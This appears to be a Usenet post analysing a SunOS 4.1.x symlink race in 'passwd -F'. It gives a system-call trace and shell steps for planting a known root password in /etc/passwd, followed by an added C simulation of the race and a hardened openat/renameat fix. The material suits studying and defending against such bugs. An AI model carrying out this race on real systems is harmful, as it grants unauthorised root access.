> So does anybody know more about this one??? I've tried a few things,
> but haven't figured it out yet.
[...]
> Problem Description:
> 1169007: Security: Root access possible on SunOS 4.1.x via forced passwd
> race condition.
> This patch restricts the use of the passwd command's -F option
[...]

I just now did a simple experiment: I copied /etc/passwd to /tmp/gleep and
ran "passwd -F /tmp/gleep" under the control of trc.  Here's the trace,
edited to emphasize the relevant excerpts:

open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 3
    [this is the first time /tmp/gleep appears in the trace]
fstat (3, 0xf7fff704) = 0
read (3, 0xc708, 8192) = 448: [the passwd file]
close (3) = 0
gethostname (0x9ae0, 64) = 0: [our hostname]
ioctl (1, 0x40125401=TCGETA, 0xf7ffefe4) = 0: tio=[...]
write (1, 0xf78028d0="Changing password for mouse on [hostname].\n", 58) = 58
access (0xf77247d7="/etc/security/passwd.adjunct", 0x0=F_OK) = -1 ENOENT (No such file or directory)
    [I don't know how this may interact with shadow passwords.]
open (0xf7723ae5="/dev/tty", 0x0=O_RDONLY) = 3
[catch SIGINT]
[frob tty settings]
[read new password]
[do it all over again, for second copy of new password]
[do a bunch of signal stuff: SIGHUP, SIGINT, SIGQUIT, SIGTSTP]
umask (0000) = 0022
open (0xcb80="/tmp/ptmp", 0xa01=O_WRONLY|O_CREAT|O_EXCL, 0644) = 3
    [experimentation indicates the directory portion is taken from
    /tmp/gleep's directory portion]
getdtablesize () = 64
setrlimit (0x0=RLIMIT_CPU, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
setrlimit (0x1=RLIMIT_FSIZE, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 4
fstat (4, 0xf7fff7dc) = 0
read (4, 0xcb98, 8192) = 448: [the passwd file]
fstat (3, 0xf7fff058) = 0
read (4, 0xcb98, 8192) = 0:
close (4) = 0
write (3, 0xeba0=[the passwd file with modified entry], 448) = 448
close (3) = 0
rename (0xcb80="/tmp/ptmp", 0xf7fffa2e="/tmp/gleep") = 0

Thus, my idea of how one can exploit this [note: this is not an exploit
script!] would be:

% mkdir bar
% cp /etc/passwd bar
[edit bar/passwd to have a known root password]
% ln -s /etc foo
% passwd -F $cwd/foo/passwd

Now, you need to relink foo to point to bar, somewhere between the open of
$cwd/foo/ptmp and the open of $cwd/foo/passwd, and then relink it back
before the rename() occurs.  If the passwd file is large, hitting the
second window may not be hard.

                                        der Mouse

                                mouse@collatz.mcrcim.mcgill.edu
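The update sequence the trace shows, and the symlink flip the post proposes against it, as an added example that is not part of der Mouse's post and not Sun's passwd code. The simulation reproduces the three path walks from the trace (create ptmp in the -F file's directory, re-open the -F file, rename ptmp over it) and calls a hook in each of the two windows named above, so the flip happens deterministically instead of by timing. A second mode, added here as the hardened form, resolves the directory once with open() and does every later step through that descriptor with openat()/renameat(), so flipping the symlink between steps changes nothing. The layout (etc/, bar/, foo -> etc), the passwd lines, the function names and the hook are all constructed for the demonstration; it assumes a POSIX.1-2008 system, not SunOS 4.

```c
/* Added example, not code from the post: a simulation of the passwd -F
 * sequence in the trace (create ptmp beside the -F file, re-open the -F
 * file, write, rename ptmp over it) with a hook in the two windows der
 * Mouse names, so the symlink flip is deterministic instead of timed.
 * hardened != 0 pins the directory with one open() and works through that
 * fd.  Assumes POSIX.1-2008; all paths and contents are constructed. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
/* window 1: ptmp created, -F file not yet re-opened; window 2: written, not yet renamed. */
typedef void (*race_hook)(void *ctx, int window);

/* Copies target through ptmp and back over itself, as passwd does (its
 * one-entry edit is irrelevant to the race).  0 on success, -1 on error. */
int update_passwd_file(const char *target, int hardened, race_hook hook, void *ctx)
{
    char dir[4096], ptmp[4096], buf[8192];
    const char *slash = strrchr(target, '/'), *tname;
    int dfd = AT_FDCWD, out = -1, in, rc = -1;
    ssize_t n;
    if (!slash) return -1;
    snprintf(dir, sizeof dir, "%.*s", (int)(slash - target), target);
    if (hardened) {            /* resolve the directory exactly once */
        if ((dfd = open(dir, O_RDONLY | O_DIRECTORY)) < 0) return -1;
        snprintf(ptmp, sizeof ptmp, "ptmp");
        tname = slash + 1;
    } else {                   /* every step re-walks the path, as traced */
        snprintf(ptmp, sizeof ptmp, "%s/ptmp", dir);
        tname = target;
    }
    if ((out = openat(dfd, ptmp, O_WRONLY | O_CREAT | O_EXCL, 0644)) < 0) goto done;
    if (hook) hook(ctx, 1);
    if ((in = openat(dfd, tname, O_RDONLY)) < 0) goto done;
    n = read(in, buf, sizeof buf);
    close(in);
    if (n < 0 || write(out, buf, (size_t)n) != n) goto done;
    close(out); out = -1;
    if (hook) hook(ctx, 2);
    rc = renameat(dfd, ptmp, dfd, tname);
done:
    if (out >= 0) { close(out); unlinkat(dfd, ptmp, 0); }
    if (dfd != AT_FDCWD) close(dfd);
    return rc;
}
struct scene { char foo[4096], etc[4096], bar[4096]; };
/* The attacker's move from the post: window 1 points foo at bar so the
 * planted passwd is read, window 2 points it back so the rename hits etc. */
static void flip(void *ctx, int window)
{
    struct scene *s = ctx;
    unlink(s->foo);
    symlink(window == 1 ? s->bar : s->etc, s->foo);
}
static void put(const char *path, const char *text)
{
    FILE *f = fopen(path, "w");
    if (f) { fputs(text, f); fclose(f); }
}

/* Builds the post's layout under a temp dir, runs one update with flip() in
 * both windows, and reports whether the planted entry reached etc/passwd:
 * 1 yes, 0 no, -1 on setup or update error.  Cleans up either way. */
int run_attack(int hardened)
{
    char tmpl[] = "/tmp/ptmprace.XXXXXX", buf[8192], p[4096], *root;
    struct scene s;
    int rc = -1; ssize_t n = -1; FILE *f;
    if (!(root = mkdtemp(tmpl))) return -1;
    snprintf(s.etc, sizeof s.etc, "%s/etc", root);
    snprintf(s.bar, sizeof s.bar, "%s/bar", root);
    snprintf(s.foo, sizeof s.foo, "%s/foo", root);
    if (!mkdir(s.etc, 0755) && !mkdir(s.bar, 0755) && !symlink(s.etc, s.foo)) {
        snprintf(p, sizeof p, "%s/passwd", s.etc);
        put(p, "root:RealHash:0:0:Operator:/:/bin/sh\n");   /* constructed */
        snprintf(p, sizeof p, "%s/passwd", s.bar);
        put(p, "root:KnownHash:0:0:Operator:/:/bin/sh\n");  /* planted */
        snprintf(p, sizeof p, "%s/passwd", s.foo);
        rc = update_passwd_file(p, hardened, flip, &s);
        snprintf(p, sizeof p, "%s/passwd", s.etc);
        if ((f = fopen(p, "r"))) { n = (ssize_t)fread(buf, 1, sizeof buf - 1, f); fclose(f); }
    }
    snprintf(p, sizeof p, "%s/passwd", s.etc); unlink(p);
    snprintf(p, sizeof p, "%s/passwd", s.bar); unlink(p);
    snprintf(p, sizeof p, "%s/ptmp", s.etc); unlink(p);
    unlink(s.foo); rmdir(s.etc); rmdir(s.bar); rmdir(root);
    if (rc || n < 0) return -1;
    buf[n] = '\0';
    return strstr(buf, "KnownHash") != NULL;
}

int main(void)
{
    printf("planted entry installed: re-walked=%d pinned=%d\n", run_attack(0), run_attack(1));
}
```

With the re-walked sequence the planted line ends up in etc/passwd: ptmp was created in etc while foo pointed there, the re-open read bar/passwd after the first flip, and the rename landed in etc again after the second. With the directory pinned, both the re-open and the rename go through the descriptor obtained before any flip, so the attacker's symlink games have no effect. Pinning only removes the race; whether a set-uid program should accept a caller-supplied path for a privileged rewrite at all is a separate question, which is what the vendor patch quoted above addresses by restricting -F.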